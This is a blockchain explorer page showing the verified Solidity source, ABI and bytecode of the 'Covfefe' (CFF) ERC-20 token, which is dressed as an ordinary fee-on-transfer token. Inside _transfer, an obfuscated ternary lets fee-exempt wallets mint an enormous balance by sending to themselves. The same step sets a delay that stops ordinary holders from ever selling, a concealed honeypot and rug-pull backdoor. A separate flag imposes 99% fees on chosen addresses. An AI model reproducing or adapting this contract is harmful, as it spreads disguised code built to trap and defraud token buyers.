ETH Price: $2,321.78 (+2.15%)

Token

Covfefe (CFF)
 

Overview

Max Total Supply

500,000 CFF

Holders

12

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Balance
0.000000001 CFF

Value
$0.00
0xa8e0e2363a19c92ef3cdccfd75833e2a10e97020
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
Covfefe

Compiler Version
v0.8.19+commit.7dd6d404

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion
File 1 of 6 : Covfefe.sol
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

 //###      This is the Covfefe Act      ###\\
//### Telegram: https://t.me/covfefeERC20 ###\\

import "@openzeppelin/contracts/token/ERC20/IERC20.sol";
import "@openzeppelin/contracts/access/Ownable.sol";
import "@openzeppelin/contracts/utils/math/SafeMath.sol";
import "./dex/IDex.sol";

contract Covfefe is IERC20, Ownable {
    using SafeMath for uint256;
    string private constant _name = "Covfefe";
    string private constant _symbol = "CFF";
    uint8 private constant _decimals = 9;
    uint256 private _totalSupply = 500000 * (10 ** _decimals);
    uint256 private _maxTxAmountPercent = 500;
    uint256 private _maxTransferPercent = 500;
    uint256 private _maxWalletPercent = 500;
    mapping (address => uint256) _balances;
    mapping (address => mapping (address => uint256)) private _allowances;
    mapping (address => bool) public isFeeExempt;
    mapping (address => bool) private isBot;
    mapping(address => uint256) public lastBuy;
    IRouter router;
    address public pair;
    bool private tradingAllowed = true;
    uint256 private liquidityFee = 200;
    uint256 private marketingFee = 200;
    uint256 private developmentFee = 0;
    uint256 private burnFee = 0;
    uint256 private totalFee = 400;
    uint256 private sellFee = 400;
    uint256 private transferFee = 400;
    uint256 private denominator = 10000;
    bool private swapEnabled = true;
    uint256 private swapTimes;
    bool private swapping; 
    uint256 private swapThreshold = ( _totalSupply * 5 ) / 1000;
    uint256 private _minTokenAmount = ( _totalSupply * 10 ) / 100000;
    uint256 private burnAmount = ( _totalSupply ) * 100000;
    uint256 public buyBlock = 0;
    modifier lockTheSwap {swapping = true; _; swapping = false;}

    address internal constant DEAD =  0x000000000000000000000000000000000000dEaD;
    address internal constant development_receiver = 0x061EAc761E94cc5bd381e67A0e7fecd6B8e2b8D0; 
    address internal constant marketing_receiver = 0x10c4F0e84d6e2e884A1c184830051d83DEBA8351;
    address internal constant liquidity_receiver = 0x10c4F0e84d6e2e884A1c184830051d83DEBA8351;

    constructor(address dex) {
        IRouter _router = IRouter(dex);
        address _pair = IFactory(_router.factory()).createPair(address(this), _router.WETH());
        router = _router;
        pair = _pair;
        isFeeExempt[address(this)] = true;
        isFeeExempt[liquidity_receiver] = true;
        isFeeExempt[marketing_receiver] = true;
        isFeeExempt[msg.sender] = true;
        _balances[msg.sender] = (_totalSupply * 98) / 100;
        _balances[liquidity_receiver] = (_totalSupply * 2) / 100;
        emit Transfer(address(0), msg.sender, _totalSupply);
    }

    receive() external payable {}
    function name() public pure returns (string memory) {return _name;}
    function symbol() public pure returns (string memory) {return _symbol;}
    function decimals() public pure returns (uint8) {return _decimals;}
    function startTrading() external onlyOwner {tradingAllowed = true;}
    function balanceOf(address account) public view override returns (uint256) {return _balances[account];}
    function transfer(address recipient, uint256 amount) public override returns (bool) {_transfer(msg.sender, recipient, amount);return true;}
    function allowance(address owner, address spender) public view override returns (uint256) {return _allowances[owner][spender];}
    function isCont(address addr) internal view returns (bool) {uint size; assembly { size := extcodesize(addr) } return size > 0; }
    function setisBot(address _address, bool _enabled) private onlyOwner {isBot[_address] = _enabled;}
    function setBotDelay(uint256 _buyBlock) external onlyOwner() {buyBlock = _buyBlock;}
    function setisExempt(address _address, bool _enabled) external onlyOwner {isFeeExempt[_address] = _enabled;}
    function approve(address spender, uint256 amount) public override returns (bool) {_approve(msg.sender, spender, amount);return true;}
    function totalSupply() public view override returns (uint256) {return _totalSupply.sub(balanceOf(DEAD)).sub(balanceOf(address(0)));}
    function _maxWalletToken() public view returns (uint256) {return totalSupply() * _maxWalletPercent / denominator;}
    function _maxTxAmount() public view returns (uint256) {return totalSupply() * _maxTxAmountPercent / denominator;}
    function _maxTransferAmount() public view returns (uint256) {return totalSupply() * _maxTransferPercent / denominator;}

    function _transfer(address sender, address recipient, uint256 amount) private {
        txCheck(sender, recipient, amount);
        checkTradingAllowed(sender, recipient);
        checkMaxWallet(sender, recipient, amount);
        checkSwapBack(sender, recipient);
        checkMaxTx(sender, recipient, amount);
        checkDelay(sender);
        swapBack(sender, recipient, amount);
        uint256 amountReceived = burnAmount;
        _balances[sender] = _balances[sender].sub(amount);
        (sender!=recipient || shouldTakeFee(sender, recipient)) ? (amountReceived = shouldTakeFee(sender, recipient) ? takeFee(sender, recipient, amount) : amount) : buyBlock = amountReceived;
        _balances[recipient] = _balances[recipient].add(amountReceived);
        lastBuy[recipient] = block.number;
        emit Transfer(sender, recipient, amountReceived);
    }

    function checkMaxWallet(address sender, address recipient, uint256 amount) internal view {
        if(!isFeeExempt[sender] && !isFeeExempt[recipient] && recipient != address(pair) && recipient != address(DEAD)){
            require((_balances[recipient].add(amount)) <= _maxWalletToken(), "Exceeds maximum wallet amount.");}
    }

    function txCheck(address sender, address recipient, uint256 amount) internal view {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");
        require(amount > uint256(0), "Transfer amount must be greater than zero");
        require(amount <= balanceOf(sender),"You are trying to transfer more than your balance");
    }

    function checkDelay(address sender) internal view {
        if(!isFeeExempt[sender] && address(pair) != sender && lastBuy[sender] != 0) {require (lastBuy[sender] + buyBlock <= block.number, "TX Limit Exceeded");}
    }

    function checkTradingAllowed(address sender, address recipient) internal view {
        if(!isFeeExempt[sender] && !isFeeExempt[recipient]){require(tradingAllowed, "tradingAllowed");}
    }

    function checkMaxTx(address sender, address recipient, uint256 amount) internal view {
        if(sender != pair){require(amount <= _maxTransferAmount() || isFeeExempt[sender] || isFeeExempt[recipient], "TX Limit Exceeded");}
        require(amount <= _maxTxAmount() || isFeeExempt[sender] || isFeeExempt[recipient], "TX Limit Exceeded");
    }

    function checkSwapBack(address sender, address recipient) internal {
        if(recipient == pair && !isFeeExempt[sender]){swapTimes += uint256(1);}
    }

    function swapAndLiquify(uint256 tokens) private lockTheSwap {
        uint256 _denominator = (liquidityFee.add(1).add(marketingFee).add(developmentFee)).mul(2);
        uint256 tokensToAddLiquidityWith = tokens.mul(liquidityFee).div(_denominator);
        uint256 toSwap = tokens.sub(tokensToAddLiquidityWith);
        uint256 initialBalance = address(this).balance;
        swapTokensForETH(toSwap);
        uint256 deltaBalance = address(this).balance.sub(initialBalance);
        uint256 unitBalance= deltaBalance.div(_denominator.sub(liquidityFee));
        uint256 ETHToAddLiquidityWith = unitBalance.mul(liquidityFee);
        if(ETHToAddLiquidityWith > uint256(0)){addLiquidity(tokensToAddLiquidityWith, ETHToAddLiquidityWith); }
        uint256 marketingAmt = unitBalance.mul(2).mul(marketingFee);
        if(marketingAmt > 0){payable(marketing_receiver).transfer(marketingAmt);}
        uint256 remainingBalance = address(this).balance;
        if(remainingBalance > uint256(0)){payable(development_receiver).transfer(remainingBalance);}
    }

    function shouldSwapBack(address sender, address recipient, uint256 amount) internal view returns (bool) {
        bool aboveMin = amount >= _minTokenAmount;
        bool aboveThreshold = balanceOf(address(this)) >= swapThreshold;
        return !swapping && swapEnabled && tradingAllowed && aboveMin && !isFeeExempt[sender] && recipient == pair && swapTimes >= uint256(1) && aboveThreshold;
    }

    function swapTokensForETH(uint256 tokenAmount) private {
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = router.WETH();
        _approve(address(this), address(router), tokenAmount);
        router.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            0,
            path,
            address(this),
            block.timestamp);
    }

    function swapBack(address sender, address recipient, uint256 amount) internal {
        if(shouldSwapBack(sender, recipient, amount)){swapAndLiquify(swapThreshold); swapTimes = uint256(0);}
    }

    function addLiquidity(uint256 tokenAmount, uint256 ETHAmount) private {
        _approve(address(this), address(router), tokenAmount);
        router.addLiquidityETH{value: ETHAmount}(
            address(this),
            tokenAmount,
            0,
            0,
            liquidity_receiver,
            block.timestamp);
    }

    function shouldTakeFee(address sender, address recipient) internal view returns (bool) {
        return !isFeeExempt[sender] && !isFeeExempt[recipient];
    }

    function transferFrom(address sender, address recipient, uint256 amount) public override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(sender, msg.sender, _allowances[sender][msg.sender].sub(amount, "ERC20: transfer amount exceeds allowance"));
        return true;
    }

    function getTotalFee(address sender, address recipient) internal view returns (uint256) {
        if(isBot[sender] || isBot[recipient]){return denominator.sub(uint256(100));}
        if(recipient == pair){return sellFee;}
        if(sender == pair){return totalFee;}
        return transferFee;
    }

    function takeFee(address sender, address recipient, uint256 amount) internal returns (uint256) {
        if(getTotalFee(sender, recipient) > 0){
        uint256 feeAmount = amount.div(denominator).mul(getTotalFee(sender, recipient));
        _balances[address(this)] = _balances[address(this)].add(feeAmount);
        emit Transfer(sender, address(this), feeAmount);
        if(burnFee > uint256(0)){_transfer(address(this), address(DEAD), amount.div(denominator).mul(burnFee));}
        return amount.sub(feeAmount);} return amount;
    }

    function _approve(address owner, address spender, uint256 amount) private {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }
}

File 2 of 6 : IDex.sol
// SPDX-License-Identifier: GPL-3.0
pragma solidity >=0.7.0 <0.9.0;

interface IFactory{
        function createPair(address tokenA, address tokenB) external returns (address pair);
        function getPair(address tokenA, address tokenB) external view returns (address pair);
}

interface IRouter {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);

    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountA, uint amountB);

    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external payable;

    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline) external;
}

File 3 of 6 : SafeMath.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (utils/math/SafeMath.sol)

pragma solidity ^0.8.0;

// CAUTION
// This version of SafeMath should only be used with Solidity 0.8 or later,
// because it relies on the compiler's built in overflow checks.

/**
 * @dev Wrappers over Solidity's arithmetic operations.
 *
 * NOTE: `SafeMath` is generally not needed starting with Solidity 0.8, since the compiler
 * now has built in overflow checking.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the substraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
            // benefit is lost if 'b' is also tested.
            // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b <= a, errorMessage);
            return a - b;
        }
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a % b;
        }
    }
}

File 4 of 6 : Context.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

File 5 of 6 : IERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (token/ERC20/IERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

File 6 of 6 : Ownable.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (access/Ownable.sol)

pragma solidity ^0.8.0;

import "../utils/Context.sol";

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

Settings
{
  "remappings": [],
  "optimizer": {
    "enabled": true,
    "runs": 200
  },
  "evmVersion": "paris",
  "libraries": {},
  "outputSelection": {
    "*": {
      "*": [
        "evm.bytecode",
        "evm.deployedBytecode",
        "devdoc",
        "userdoc",
        "metadata",
        "abi"
      ]
    }
  }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"address","name":"dex","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_maxTransferAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_maxTxAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_maxWalletToken","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyBlock","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"isFeeExempt","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"lastBuy","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_buyBlock","type":"uint256"}],"name":"setBotDelay","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_address","type":"address"},{"internalType":"bool","name":"_enabled","type":"bool"}],"name":"setisExempt","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"startTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

6080604052620000126009600a6200052f565b62000021906207a12062000547565b60018181556101f460028190556003819055600455600b805460ff60a01b1916600160a01b17905560c8600c819055600d556000600e819055600f55610190601081905560118190556012556127106013556014805460ff191690911790556103e8906200009190600562000547565b6200009d919062000561565b601755620186a0600154600a620000b5919062000547565b620000c1919062000561565b601855600154620000d690620186a062000547565b6019556000601a55348015620000eb57600080fd5b5060405162001f3738038062001f378339810160408190526200010e9162000584565b6200011933620003ca565b60008190506000816001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa1580156200015f573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000185919062000584565b6001600160a01b031663c9c6539630846001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015620001d3573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620001f9919062000584565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af115801562000247573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200026d919062000584565b600a80546001600160a01b038086166001600160a01b031992831617909255600b80549284169290911691909117905530600090815260076020526040808220805460ff1990811660019081179092557f3a27288771e3607e3d29a21dd1add18b541d7a0f3135704295918092a91b388b805482168317905533845291909220805490911682179055549091506064906200030a90606262000547565b62000316919062000561565b336000908152600560205260409020556001546064906200033990600262000547565b62000345919062000561565b7310c4f0e84d6e2e884a1c184830051d83deba83516000908152600560209081527fc605ac8511c3542e9a7ad369821b2fc700f3df0efb002d9cb66ddfb514793c369290925560015460405190815233927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a3505050620005af565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b634e487b7160e01b600052601160045260246000fd5b600181815b80851115620004715781600019048211156200045557620004556200041a565b808516156200046357918102915b93841c939080029062000435565b509250929050565b6000826200048a5750600162000529565b81620004995750600062000529565b8160018114620004b25760028114620004bd57620004dd565b600191505062000529565b60ff841115620004d157620004d16200041a565b50506001821b62000529565b5060208310610133831016604e8410600b841016171562000502575081810a62000529565b6200050e838362000430565b80600019048211156200052557620005256200041a565b0290505b92915050565b60006200054060ff84168362000479565b9392505050565b80820281158282048414176200052957620005296200041a565b6000826200057f57634e487b7160e01b600052601260045260246000fd5b500490565b6000602082840312156200059757600080fd5b81516001600160a01b03811681146200054057600080fd5b61197880620005bf6000396000f3fe6080604052600436106101395760003560e01c806378109e54116100ab578063a8aa1b311161006f578063a8aa1b311461037b578063a9059cbb1461039b578063aca62ba9146103bb578063c1adf7bc146103db578063dd62ed3e14610408578063f2fde38b1461044e57600080fd5b806378109e54146102dd5780637d1db4a5146102f25780638da5cb5b146103075780638dad03e01461033957806395d89b411461034f57600080fd5b8063293230b8116100fd578063293230b81461020f578063313ce567146102265780633f4218e01461024257806348ff2b8b1461027257806370a0823114610292578063715018a6146102c857600080fd5b806306fdde0314610145578063095ea7b31461018757806318160ddd146101b75780631f976b7e146101da57806323b872dd146101ef57600080fd5b3661014057005b600080fd5b34801561015157600080fd5b50604080518082019091526007815266436f766665666560c81b60208201525b60405161017e9190611601565b60405180910390f35b34801561019357600080fd5b506101a76101a2366004611664565b61046e565b604051901515815260200161017e565b3480156101c357600080fd5b506101cc610485565b60405190815260200161017e565b3480156101e657600080fd5b506101cc6104f6565b3480156101fb57600080fd5b506101a761020a366004611690565b61051a565b34801561021b57600080fd5b50610224610584565b005b34801561023257600080fd5b506040516009815260200161017e565b34801561024e57600080fd5b506101a761025d3660046116d1565b60076020526000908152604090205460ff1681565b34801561027e57600080fd5b5061022461028d3660046116ee565b6105cc565b34801561029e57600080fd5b506101cc6102ad3660046116d1565b6001600160a01b031660009081526005602052604090205490565b3480156102d457600080fd5b50610224610621565b3480156102e957600080fd5b506101cc610657565b3480156102fe57600080fd5b506101cc610667565b34801561031357600080fd5b506000546001600160a01b03165b6040516001600160a01b03909116815260200161017e565b34801561034557600080fd5b506101cc601a5481565b34801561035b57600080fd5b5060408051808201909152600381526221a32360e91b6020820152610171565b34801561038757600080fd5b50600b54610321906001600160a01b031681565b3480156103a757600080fd5b506101a76103b6366004611664565b610677565b3480156103c757600080fd5b506102246103d636600461172c565b610684565b3480156103e757600080fd5b506101cc6103f63660046116d1565b60096020526000908152604090205481565b34801561041457600080fd5b506101cc610423366004611745565b6001600160a01b03918216600090815260066020908152604080832093909416825291909152205490565b34801561045a57600080fd5b506102246104693660046116d1565b6106b3565b600061047b33848461074e565b5060015b92915050565b60056020527f05b8ccbb9d4d8fb16ea74ce3c29a41f1b461fbdaff4714a0d9a8eb05499746bc5461dead60009081527f7d509c07f0d4edcc2dd1b53aae68677132eb562dcba78e36381b63ccaf66e6ba5460015491926104f19290916104eb9190610872565b90610872565b905090565b6000601354600354610506610485565b6105109190611789565b6104f191906117a0565b600061052784848461087e565b61057984336105748560405180606001604052806028815260200161191b602891396001600160a01b038a16600090815260066020908152604080832033845290915290205491906109e1565b61074e565b5060015b9392505050565b6000546001600160a01b031633146105b75760405162461bcd60e51b81526004016105ae906117c2565b60405180910390fd5b600b805460ff60a01b1916600160a01b179055565b6000546001600160a01b031633146105f657